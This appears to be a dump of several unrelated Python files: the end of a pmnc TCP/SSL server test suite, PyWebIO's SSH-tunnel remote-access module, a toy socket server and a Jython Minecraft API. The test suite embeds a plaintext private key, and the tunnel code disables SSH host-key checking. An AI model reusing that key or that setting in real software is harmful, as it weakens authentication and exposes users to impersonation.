connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
test_res(ifc, r)
finally:
ifc.cease(); ifc.stop()
test_loopback_2way()
###############################
pmnc.log.message("****************** LOOPBACK INCOMPATIBLE PROTOCOLS ******************")
def test_loopback_protocols():
ifc = start_interface(LineEchoParser, ssl_protocol = "TLSv1_1")
try:
fake_request(10.0)
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_2",
ssl_server_hostname = None,
ssl_ignore_hostname = True,
cert_reqs = CERT_OPTIONAL)
try:
s.do_handshake()
except Exception as e:
assert "VERSION" in str(e)
else:
assert False, "shouldn't be able to connect over incompatible protocol"
s.close()
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_1",
ssl_server_hostname = None,
ssl_ignore_hostname = True,
cert_reqs = CERT_OPTIONAL)
s.do_handshake()
s.close()
finally:
ifc.cease(); ifc.stop()
if ssl_protocol:
test_loopback_protocols()
###############################
pmnc.log.message("****************** SIMPLE HOSTNAME MISMATCH ******************")
def test_simple_hostname_mismatch():
ifc = start_interface(LineEchoParser)
try:
fake_request(10.0)
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ("localhost", ifc.listener_address[1]),
connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = False)
try:
r.connect()
except Exception as e:
assert "match" in str(e) and "localhost" in str(e)
else:
assert False, "shouldn't be able to connect"
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ("localhost", ifc.listener_address[1]),
connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
r.connect()
r.disconnect()
finally:
ifc.cease(); ifc.stop()
if ssl_protocol:
test_simple_hostname_mismatch()
###############################
pmnc.log.message("****************** SNI HOSTNAME MISMATCH ******************")
def test_sni_hostname_mismatch():
ifc = start_interface(LineEchoParser, ssl_protocol = "TLSv1_1")
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_1",
ssl_server_hostname = "foobar",
ssl_ignore_hostname = False,
cert_reqs = CERT_OPTIONAL)
try:
s.do_handshake()
except Exception as e:
assert "match" in str(e) and "foobar" in str(e)
else:
assert False, "shouldn't be able to connect to a mismatched server"
s.close()
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_1",
ssl_server_hostname = "foobar",
ssl_ignore_hostname = True,
cert_reqs = CERT_OPTIONAL)
s.do_handshake()
s.close()
finally:
ifc.cease(); ifc.stop()
if ssl_protocol:
test_sni_hostname_mismatch()
###############################
pmnc.log.message("****************** INITIAL IDLE TIMEOUT ******************")
def test_initial_idle_timeout():
ifc = start_interface(NullParser)
try:
s = connect_to(ifc)
assert not peer_drops_connection(s, request_timeout - 1.0)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_initial_idle_timeout()
###############################
pmnc.log.message("****************** REQUEST READING TIMEOUT ******************")
def test_read_timeout():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
t = Timeout(request_timeout - 1.0)
while not t.expired:
s.sendall(b"x")
sleep(0.1)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_read_timeout()
###############################
pmnc.log.message("****************** PROCESSING TIMEOUT ******************")
class SlowProcessingLineEchoParser(LineEchoParser):
def process_tcp_request(self):
sleep(request_timeout + 1.0)
self._response = BytesIO(self._data)
def test_process_timeout():
ifc = start_interface(SlowProcessingLineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"x\n")
assert not peer_drops_connection(s, request_timeout - 1.0)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_process_timeout()
###############################
pmnc.log.message("****************** PROCESSING ERROR ******************")
class SlowProcessingLineEchoParser(LineEchoParser):
def process_tcp_request(self):
raise Exception("processing error")
def test_process_error():
ifc = start_interface(SlowProcessingLineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"x\n")
assert peer_drops_connection(s, 1.0)
finally:
ifc.cease(); ifc.stop()
test_process_error()
###############################
pmnc.log.message("****************** RESPONSE WRITING TIMEOUT ******************")
class SlowWritingLineEchoParser(LineEchoParser):
def produce(self, n):
sleep(0.1)
return self._response.read(1)
def test_write_timeout():
ifc = start_interface(SlowWritingLineEchoParser)
try:
s = connect_to(ifc)
t = Timeout(request_timeout - 1.0)
s.sendall(b"x" * 1000 + b"\n")
while t.remain > 1.0:
x = s.recv(10)
assert x == b"x" * len(x)
assert not peer_drops_connection(s, t.remain)
assert peer_drops_connection(s, 4.0)
finally:
ifc.cease(); ifc.stop()
test_write_timeout()
###############################
pmnc.log.message("****************** KEEP-ALIVE TIMEOUT ******************")
def test_reuse_timeout():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"foo\n")
assert peer_drops_connection(s, 7.0)
finally:
ifc.cease(); ifc.stop()
test_reuse_timeout()
###############################
pmnc.log.message("****************** TWO KEEP-ALIVE TIMEOUTS ******************")
def test_reuse_timeout2():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"foo\n") # request #1
assert not peer_drops_connection(s, 4.0) # 5.0 - 1.0
s.sendall(b"foo\n") # request #2
assert not peer_drops_connection(s, 4.0)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_reuse_timeout2()
###############################
pmnc.log.message("****************** STRESS TEST ******************")
class RandomProcessingLineEchoParser(LineEchoParser):
def process_tcp_request(self):
sleep(random() * 0.2)
LineEchoParser.process_tcp_request(self)
def test_stress():
ifc = start_interface(RandomProcessingLineEchoParser)
try:
requests_per_thread = 50
request_count_lock = Lock()
request_count = 0
def th_proc():
s = connect_to(ifc)
r = s.makefile("rb")
for i in range(requests_per_thread):
sleep(random() * 0.2)
data = b"x" * randint(1, 262144) + b"\n"
s.sendall(data)
sleep(random() * 0.2)
assert r.readline() == data
with request_count_lock:
nonlocal request_count
request_count += 1
assert not peer_drops_connection(s, 4.5)
assert peer_drops_connection(s, 4.5)
ths = [ Thread(target = th_proc) for i in range(max_connections) ]
for th in ths: th.start()
for th in ths: th.join()
assert request_count == requests_per_thread * max_connections
finally:
ifc.cease(); ifc.stop()
test_stress()
###############################
pmnc.log.message("****************** LOCKOUT TEST ******************")
class HangingLineEchoParser(LineEchoParser):
def process_tcp_request(self):
if self._data != b"ok\n":
sleep(request_timeout + 1.0)
LineEchoParser.process_tcp_request(self)
def test_lockout():
ifc = start_interface(HangingLineEchoParser)
try:
requests_per_thread = 10
def th_proc():
s = connect_to(ifc)
r = s.makefile("rb")
for i in range(requests_per_thread):
sleep(random())
data = b"x" * randint(1, 262144) + b"\n"
try:
s.sendall(data)
resp = r.readline()
except:
s = connect_to(ifc)
r = s.makefile("rb")
continue
else:
assert resp == b""
ths = [ Thread(target = th_proc) for i in range(max_connections) ]
for th in ths: th.start()
for th in ths: th.join()
sleep(request_timeout) # this makes all the queued requests expire
# and the next request is processed as though nothing happened
start = time()
s = connect_to(ifc)
r = s.makefile("rb")
data = b"ok\n"
s.sendall(data)
assert r.readline() == data
assert time() - start < 1.0
finally:
ifc.cease(); ifc.stop()
test_lockout()
###############################
pmnc.log.message("****************** DOS TEST ******************")
class SlowLineEchoParser(LineEchoParser):
def process_tcp_request(self):
sleep(request_timeout * random() / 3)
LineEchoParser.process_tcp_request(self)
def test_dos():
ifc = start_interface(SlowLineEchoParser, max_connections = 50)
try:
start = time()
def th_proc():
while time() < start + 60.0:
data = b"x\n"
try:
s = connect_to(ifc)
s.sendall(data)
s.select([s], [], [], 1.0)
except:
pass
ths = [ Thread(target = th_proc) for i in range(50) ]
for th in ths: th.start()
for th in ths: th.join()
sleep(request_timeout) # this makes all the queued requests expire
# and the next request is processed as though nothing happened
start = time()
s = connect_to(ifc)
r = s.makefile("rb")
data = b"x\n"
s.sendall(data)
assert r.readline() == data
assert time() - start < request_timeout / 3.0 + 1.0
finally:
ifc.cease(); ifc.stop()
test_dos()
###################################
# TCP
test_interface(None, None, None, None)
###################################
# SSL
test_ca_cert = """-----BEGIN CERTIFICATE-----
MIIC9TCCAd2gAwIBAgIBADANBgkqhkiG9w0BAQsFADANMQswCQYDVQQDDAJDQTAe
Fw0xOTAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMA0xCzAJBgNVBAMMAkNBMIIB
IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxV903JyafnXPL/eVnAd/+eY3
n6yVdqCiwjdq8ijt6+c8pTLb3JmvpkQnVQJ6rwFdF0p/qKa0ghvAkNehzwLSWqMj
56ce6d5/gIsh6PQRZEkcPkVfKvC03IRwvB2ObfQyL7/fAmGWwfiKIBpy/O4qNxcP
nMjCpfmYo3fLIqOZGSRE3BARk5GywcTjWPnVXWbkLdVorwOk5lm5zs98dQh8pu7Q
9V2YA2RvIm/QkXLGDmQc3AdbwM6i1NdexlgwbCdfP3MvtxLqti60woQvhACiV210
ddP7PU07VvxItnw/lYYKkZBybAjrfaNH5TwzjVD6tr18RZX9Hn4z8+dNz4kLqwID
AQABo2AwXjAPBgNVHRMBAf8EBTADAQH/MAsGA1UdDwQEAwIBBjAdBgNVHQ4EFgQU
daB4T0JlwTNT38CZsajeFw9KArUwHwYDVR0jBBgwFoAUdaB4T0JlwTNT38CZsaje
Fw9KArUwDQYJKoZIhvcNAQELBQADggEBADGS7NZe3jHZZtJy2JPScx4R20nHygTW
OKq5q2EYdlClPDj7JjRckJB8GSRcOdo/69tNn/28HxtCe6PKZklNQTKPP21msPu6
Cz+Ey1dEuZlpPDX+3ntxl0cXv02iAolmHKk/9I0AQRrBnFmO7zcC1LjU0w2O9a0t
ijO5kP3/7MM7+jqk/ff94vhSkxqAC8m4V9ypmxBFRKBA9FuiSDnx0KWqNCterpAt
XgyXnpmIGPih3Qq1tS+i7wJGzMVP6YsIKPS0fqqc88LUBmMmibiBlw/oj51JsPeS
scXlhdydmgVokDyHh9asuOi11G5SJdkwJEFChibg6xcmsIfWITgc0ig=
-----END CERTIFICATE-----"""
test_ca_cert_pem = os_path.join(__cage_dir__, "ssl_keys", "test_ca_cert.pem")
with open(test_ca_cert_pem, "w") as f:
f.write(test_ca_cert)
test_key_cert = """-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDKGN8mIQsTwSnw
oP+jF2wJnqx8iW/AbdNWeoPTfz3e9/bZkleuuIdSUiQk15IxCoaSAxhkDnM/Y2A9
9CVGfC/XhJ0C3NZQGQK8HVih93X+/8y6HrHPVyUKTzzEBC0Jnipw7F7bwRRtBno3
r+lji84b4b/I0cMudc/P04fZYivzKSrReS7dr/EhwlF3AAu0Cvyt0ictgZ+dr9rH
mrfHjZLV0H++pNWsCX/Yf23qz0gMZq5HlTaOPteUsyzvS52/TtKignYQwKI20DU1
AO1ltYrryGdOKWU3xEh20wDVkU794/CHTb8GIdtJ2HZ6VnbeCgXofOGB+1fAq1La
cA/GYcopAgMBAAECggEARPxWd+qBoH2odlZOzPo6y9HZKS208ufKY1Ow2iouEYVt
QvmcaqzcrHITmmvnoEvqgb8CvWzdVD705FEJxFSx9Ax1mDuQAIl5EIOn9KnHIoNo
/ANsSM2DfFBt+q8+PHE8JY3aF4OCGHFEmOu4bF2VvpjB4agQyzQ1+shHMCI9xGOm
mHarV1KE9V/fZ6OwSQ0+SuPn9kFvHFVHpyOoS+2Mk2cO7Uasvsx5VX0leQesGSOQ
NVUk0Klyf4rdv8AqlqS7h97Ereh+4NhroV5Dmje6PVJb5VQWmKIDMXetslJnNn9x
74/hBKzZzcJiInmCsf9eTNRPi1nCMBJEAF0o1qvzfQKBgQDvSekXVxU/rYbIylJc
gZSBo1U3rNDLneoJp2WDJtYSU4krsDNU7gNFglt1RJy+50gs9UQVL7ulSy/t/cUh
FrRmnR13H9FHagQcIs2vkKYGYCEsOeLBGWeC8+PRNFgE2K24rQjWoF5aX0lUApMt
dLApNJ6ThfsVjtedlpVPRMcCHwKBgQDYNgmCKrQ7SnRmCn2CMXj+hiGtHiWvDROw
dirAtgayJp8MsQ72sf6seSba/1QKXaowy65zENTvSUeWkeHqbP2uDdA8q6Stdo51
Wl0FjFWI2+7l8ajt39oFeXjcDBqXpB9zywF8+NvE/1aSOb5mA6FJ0CNTrPVESmzR
2tkf7FP6twKBgHmRFCFudXYfY315BDTJBDiEUVPysTTw6iizaagiv9kZpXOTldCN
Bw52Np6yF+wItitZA5i74loMg7ImHdM8pLQJGCIgAQOGAcaFi/eoxiAxEElWszOl
A2iNHW14aUs1BbTv+7CGUskY5bkPgdQzFxgoCnQqOjBunG4MRZi6+VvDAoGBAJp4
6Qw1xHUD+euZnRgyjnaSkGbmPhg2KJYPpvXuVxRbIZFowv8gJotFN6yJdZq+VsTs
EOQm52tamKoL6jOZ0RjUx61BGLPSG2/ess0u+UGBmMpygLYLE/KLWf0lLK6g1NPe
+141UpcJsulgFhc+irJ44XR8AvPalKrOSAhVyZ47AoGBANlNdybQ42Po+qwPKmnX
CrydNcDpjxvjOMBFK6u62H31azy1Ywjq/E889stWhC/gfu59mryoiaL3OHUSGKA4
vnq3uE6p9rrHemDbsbxu0ulB7nWjGYMO8CJ0eZQtJ2XhsAq6T+PLyjvtcTpF8Quj
qAq7Vjx1b1l0NttiU7YtSe+2
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDQjCCAiqgAwIBAgIBBjANBgkqhkiG9w0BAQsFADANMQswCQYDVQQDDAJDQTAe
Fw0xOTAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMBQxEjAQBgNVBAMMCTEyNy4w
LjAuMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMoY3yYhCxPBKfCg
/6MXbAmerHyJb8Bt01Z6g9N/Pd739tmSV664h1JSJCTXkjEKhpIDGGQOcz9jYD30
JUZ8L9eEnQLc1lAZArwdWKH3df7/zLoesc9XJQpPPMQELQmeKnDsXtvBFG0Gejev
6WOLzhvhv8jRwy51z8/Th9liK/MpKtF5Lt2v8SHCUXcAC7QK/K3SJy2Bn52v2sea
t8eNktXQf76k1awJf9h/berPSAxmrkeVNo4+15SzLO9Lnb9O0qKCdhDAojbQNTUA
7WW1iuvIZ04pZTfESHbTANWRTv3j8IdNvwYh20nYdnpWdt4KBeh84YH7V8CrUtpw
D8ZhyikCAwEAAaOBpTCBojAJBgNVHRMEAjAAMAsGA1UdDwQEAwIF4DA0BgNVHSUE
LTArBggrBgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcKAwMGCWCGSAGG+EIEATAd
BgNVHQ4EFgQUCkRwfnvsDzuyMwDIsY7WEGkB68EwHwYDVR0jBBgwFoAUdaB4T0Jl
wTNT38CZsajeFw9KArUwEgYDVR0RAQH/BAgwBocEfwAAATANBgkqhkiG9w0BAQsF
AAOCAQEAStqUhxrmawsLE/2zs3koYDDokUaf8Ys0J1UBhszZ7QwFURBQTkxBU5im
avuQUHyzRuNjzMdS+UMqCwhBddiTNg9kFx+5eBpxJghheFXsQnMXsqtem7sbiEot
ZnfqzPhwJOvCVUzeyBta3YWCKFuP/sETizXNZvxIsTW0AQCIk+t98k6E6HnBD7/l
RpsGGA8wJJ9HCvJWY7vCWZi1kHTdtqvsG5a4MzGJag9gbKtuhIezXNRiHdNjbM4E
EZxxmiyIKzWDjHRToGyreMLCtbZB6Mnt5pQH8yZYBpxx4Gsx+tMhwsOSZvYetuPd
4srBSr1jxrFM2vyCz9iEUexA59IcMA==
-----END CERTIFICATE-----
"""
test_key_cert_pem = os_path.join(__cage_dir__, "ssl_keys", "test_key_cert.pem")
with open(test_key_cert_pem, "w") as f:
f.write(test_key_cert)
test_interface(test_key_cert_pem, test_ca_cert_pem, "HIGH:!aNULL:!MD5", "TLSv1")
###################################
if __name__ == "__main__": import pmnc.self_test; pmnc.self_test.run()
###############################################################################
# EOF
|
remote_access.py
|
"""
* Implementation of remote access
Use https://github.com/wang0618/localshare service by running a ssh subprocess in PyWebIO application.
The stdout of ssh process is the connection info.
"""
import json
import logging
import os
import threading
import time
import shlex
from subprocess import Popen, PIPE
import shutil
logger = logging.getLogger(__name__)
success_msg = """
================================================================================
PyWebIO Application Remote Access
Remote access address: {address}
================================================================================
"""
_ssh_process = None # type: Popen
def am_i_the_only_thread():
"""Whether the current thread is the only non-Daemon threads in the process"""
alive_none_daemonic_thread_cnt = sum(
1 for t in threading.enumerate()
if t.is_alive() and not t.isDaemon()
)
return alive_none_daemonic_thread_cnt == 1
def remote_access_service(local_port=8080, server='app.pywebio.online', server_port=1022, setup_timeout=60):
"""
Wait at most one minute to get the ssh output, if it gets a normal out, the connection is successfully established.
Otherwise report error and kill ssh process.
:param local_port: ssh local listen port
:param server: ssh server domain
:param server_port: ssh server port
:param setup_timeout: If the service can't setup successfully in `setup_timeout` seconds, then exit.
"""
global _ssh_process
cmd = "ssh -oStrictHostKeyChecking=no -R 80:localhost:%s -p %s %s -- --output json" % (
local_port, server_port, server)
args = shlex.split(cmd)
logger.debug('remote access service command: %s', cmd)
_ssh_process = Popen(args, stdout=PIPE, stderr=PIPE)
logger.debug('remote access process pid: %s', _ssh_process.pid)
success = False
def timeout_killer(wait_sec):
time.sleep(wait_sec)
if not success and _ssh_process.poll() is None:
_ssh_process.kill()
threading.Thread(target=timeout_killer, kwargs=dict(wait_sec=setup_timeout), daemon=True).start()
stdout = _ssh_process.stdout.readline().decode('utf8')
logger.debug('ssh server stdout: %s', stdout)
connection_info = {}
try:
connection_info = json.loads(stdout)
success = True
except json.decoder.JSONDecodeError:
if not success and _ssh_process.poll() is None:
_ssh_process.kill()
if success:
if connection_info.get('status', 'fail') != 'success':
print("Failed to establish remote access, this is the error message from service provider:",
connection_info.get('message', ''))
else:
print(success_msg.format(address=connection_info['address']))
# wait ssh or main thread exit
while not am_i_the_only_thread() and _ssh_process.poll() is None:
time.sleep(1)
if _ssh_process.poll() is None: # main thread exit, kill ssh process
logger.debug('App process exit, killing ssh process')
_ssh_process.kill()
else: # ssh process exit by itself or by timeout killer
stderr = _ssh_process.stderr.read().decode('utf8')
if stderr:
logger.error('PyWebIO application remote access service error: %s', stderr)
else:
logger.info('PyWebIO application remote access service exit.')
def start_remote_access_service_(**kwargs):
try:
remote_access_service(**kwargs)
except KeyboardInterrupt: # ignore KeyboardInterrupt
pass
finally:
if _ssh_process:
logger.debug('Exception occurred, killing ssh process')
_ssh_process.kill()
raise SystemExit
def start_remote_access_service(**kwargs):
if not shutil.which("ssh"):
return logging.error("No ssh client found, remote access service can't start.")
server = os.environ.get('PYWEBIO_REMOTE_ACCESS', 'app.pywebio.online:1022')
if ':' not in server:
server_port = 22
else:
server, server_port = server.split(':', 1)
kwargs.setdefault('server', server)
kwargs.setdefault('server_port', server_port)
thread = threading.Thread(target=start_remote_access_service_, kwargs=kwargs)
thread.start()
return thread
if __name__ == '__main__':
import argparse
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="localhost.run Remote Access service")
parser.add_argument("--local-port", help="the local port to connect the tunnel to", type=int, default=8080)
parser.add_argument("--server", help="the local port to connect the tunnel to", type=str,
default='app.pywebio.online')
parser.add_argument("--server-port", help="the local port to connect the tunnel to", type=int, default=1022)
args = parser.parse_args()
t = start_remote_access_service(local_port=args.local_port, server=args.server, server_port=args.server_port)
t.join()
|
server1.py
|
import socket
import threading
import random
HEADER = 64
PORT = 65432
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = '!DISCONNECT'
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr): #handles client individually (threaded)
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT) #from client
if msg_length: #if msg_length has something
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected=False
print(f'[{addr}] {msg}') #prints what client sent to server
conn.send(f"[FROM SERVER] {msg} {random.randint(1,10)}".encode(FORMAT))
#for debugging
# voltage = random.randint(1,10)
# conn.send(f'[FROM SERVER] Voltage is now {voltage}'.encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target = handle_client, args = (conn,addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount()-1}")
if __name__ == '__main__':
print("[STARTING] server is starting...")
start()
# def maingui(client):
# pass
#
# guithread = threading.Thread(target = maingui, args = (client))
# guithread.start()
#
# def livefeed(timeout):
# pass
#
# livefeedthread = threading.Thread(target = livefeed, args = (timeout))
# livefeedthread.start()
|
mcapi.py
|
# /bin/python
# -*- coding: utf-8 -*-
# from __future__ import absolute_import, division, print_function, unicode_literals
# Doesn't work with Jython, with not much hope of improving
# See https://bugs.jython.org/issue2007
print ('MCAPI activating')
# Set default encoding to utf-8
if os.name == 'java':
from org.python.core import codecs
codecs.setDefaultEncoding('utf-8')
from org.bukkit import Bukkit
from org.bukkit import Location, Color, Effect, Material, Sound, TreeType, Particle, FireworkEffect
from org.bukkit.plugin import EventExecutor
from org.bukkit.entity import EntityType
from org.bukkit.command import Command
from org.bukkit.event import Listener, EventPriority, HandlerList
from org.bukkit.scheduler import BukkitRunnable
from org.bukkit.FireworkEffect import Type as FireworkEffectType
from functools import wraps
from threading import Thread
from random import *
from time import sleep
import sys
import traceback
SERVER = Bukkit.getServer()
WORLD = SERVER.getWorlds().get(0)
PLUGIN = SERVER.getPluginManager().getPlugin('MinecraftPyServer')
_commandMapField = SERVER.getClass().getDeclaredField("commandMap")
_commandMapField.setAccessible(True)
_commandMap = _commandMapField.get(SERVER)
class SpigotRunnable(BukkitRunnable):
def __init__(self, execfunc):
super(BukkitRunnable, self).__init__()
self.execfunc = execfunc
self.returnval = None
self.done = False
def run(self):
try:
self.returnval = self.execfunc()
except Exception as e:
print('\n*** An error occurred:\n' + str(e))
sys.stdout.flush()
self.done = True
class SpigotCommand(Command):
def __init__(self, name, execfunc):
Command.__init__(self, name)
self.execfunc = execfunc
def execute(self, caller, label, parameters):
self.execfunc(caller, parameters)
class EventListener(Listener):
def __init__(self, func):
self.func = func
def execute(self, event):
self.func(event)
# EventExecutor implementation
class Executor(EventExecutor):
def execute(self, listener, event):
listener.execute(event)
class AttrWrapper(object):
def __init__(self, wrapped):
self._wrapped = wrapped
self.delay = None
def __str__(self):
return self._wrapped.__str__()
def __getattr__(self, name):
f = getattr(self._wrapped, name)
@wraps(f)
def wrapped_f(*args, **kwargs):
g = lambda: f(*args, **kwargs)
d = self.delay
self.delay = None
return run_spigot_thread(g, delay=d, wait_for=True)
return wrapped_f
def run_local_thread(execfunc):
def wrap_exception(g):
try:
g()
except Exception as e:
traceback.print_exc(file=sys.stderr)
sys.stderr.flush()
Thread(target=lambda: wrap_exception(execfunc)).start()
sys.stderr.flush()
def run_spigot_thread(execfunc, delay, wait_for):
spigot_runnable = SpigotRunnable(execfunc)
if delay is None: spigot_runnable.runTask(PLUGIN)
else: spigot_runnable.runTaskLater(PLUGIN, delay)
if wait_for:
while not spigot_runnable.done:
sleep(0.1)
return spigot_runnable.returnval
return spigot_runnable
def asynchronous():
def actual_decorator(f):
@wraps(f)
def wrapped_f(*args, **kwargs):
g = lambda: f(*args, **kwargs)
return run_local_thread(g)
return wrapped_f
return actual_decorator
def synchronous(delay=None, wait_for=True):
def actual_decorator(f):
@wraps(f)
def wrapped_f(*args, **kwargs):
g = lambda: f(*args, **kwargs)
return run_spigot_thread(g, delay, wait_for)
return wrapped_f
return actual_decorator
def add_command(name, execfunc):
# execfunc signature: execfunc(caller, params)
_commandMap.register("jycraft", SpigotCommand(name, execfunc))
return name
def remove_command(name):
_commandMap.getCommand(name).unregister(_commandMap)
_commandMap.getKnownCommands().remove(name)
def add_event_listener(event_type, execfunc, priority=EventPriority.NORMAL):
# execfunc signature: execfunc(event)
listener = EventListener(execfunc)
executor = Executor()
SERVER.getPluginManager().registerEvent(event_type, listener, priority, executor, PLUGIN)
return listener
def remove_event_listeners():
HandlerList.unregisterAll(PLUGIN)
def remove_event_listener(listener):
HandlerList.unregisterAll(listener)
world = AttrWrapper(WORLD)
# -------------------------
# Built-in helper functions
# -------------------------
def parseargswithpos(args, kwargs=None, asint=True, ledger={}):
results = {}
if kwargs is None: kwargs = {}
if isinstance(args[0], int) or isinstance(args[0], float):
base = 3
tr = [args[0], args[1], args[2]]
elif 'x' in kwargs and 'y' in kwargs and 'z' in kwargs:
base = 0
tr = [kwargs['x'], kwargs['y'], kwargs['z']]
elif isinstance(args[0], list):
base = 1
tr = [args[0][0], args[0][1], args[0][2]]
elif isinstance(args[0], dict):
base = 1
tr = [args[0]['x'], args[0]['y'], args[0]['z']]
else:
base = 1
tr = [args[0].x, args[0].y, args[0].z]
if asint:
pos = (int(tr[0]), int(tr[1]), int(tr[2]))
results['x'] = pos[0]
results['y'] = pos[1]
results['z'] = pos[2]
for k, v in ledger.iteritems():
results[k] = kwargs.get(v[0], None)
if results[k] is None:
if len(args) > base+v[1]:
results[k] = args[base+v[1]]
else:
results[k] = v[2]
return results
def player(name=None):
if name:
return SERVER.getPlayer(name)
pl = SERVER.getOnlinePlayers()
return choice(pl)
def location(*args):
if len(args) == 0:
return player().getLocation()
if len(args) == 1:
return args[0].getLocation()
return Location(WORLD, *args)
def lookingat(entity=None, distance=100):
if not entity:
entity = player()
return entity.getTargetBlock(None, distance)
def yell(message):
SERVER.broadcastMessage(message)
@synchronous()
def time(time=None):
if time is None:
return WORLD.getTime()
WORLD.setTime(time)
@synchronous()
def weather(raining=False, thunder=False):
WORLD.setStorm(raining)
WORLD.setThundering(thunder)
@synchronous()
def teleport(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={'whom':['whom', 0, None]})
if not r['whom']:
r['whom'] = player().getName()
someone = player(r['whom'])
someone.teleport(location(r['x'], r['y'], r['z']))
@synchronous()
def getblock(*args, **kwargs):
r = parseargswithpos(args, kwargs)
return WORLD.getBlockAt(r['x'], r['y'], r['z'])
@synchronous()
def setblock(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE]})
WORLD.getBlockAt(r['x'], r['y'], r['z']).setType(r['type'])
@synchronous()
def line_x(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for s in range(size):
setblock(s + r['x'], r['y'], r['z'], r['type'])
@synchronous()
def line_y(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for s in range(size):
setblock(r['x'], s + r['y'], r['z'], r['type'])
@synchronous()
def line_z(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for s in range(size):
setblock(r['x'], r['y'], s + r['z'], r['type'])
@synchronous()
def cube(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for x in range(size):
for y in range(size):
for z in range(size):
setblock(x + r['x'], y + r['y'], z + r['z'], r['type'])
@synchronous()
def bolt(*args, **kwargs):
r = parseargswithpos(args, kwargs)
return WORLD.strikeLightning(location(r['x'], r['y'], r['z']))
@synchronous()
def explosion(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={'power':['power', 0, 8]})
return WORLD.createExplosion(r['x'], r['y'], r['z'], r['power'], True)
@synchronous()
def particle(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Particle.SPELL],
'count':['count', 1, 100],
'ox':['ox', 2, 1],
'oy':['oy', 3, 1],
'oz':['oz', 4, 1],
'speed':['speed', 5, 100],
'data':['data', 6, None]})
WORLD.spawnParticle(r['type'],
r['x'], r['y'], r['z'],
r['count'],
r['ox'], r['oy'], r['oz'],
r['speed'], r['data'])
@synchronous(wait_for=True)
def spawn(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, EntityType.CHICKEN]})
return WORLD.spawnEntity(location(r['x'], r['y'], r['z']), r['type'])
@synchronous()
def effect(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Effect.PORTAL_TRAVEL],
'data':['data', 1, 0],
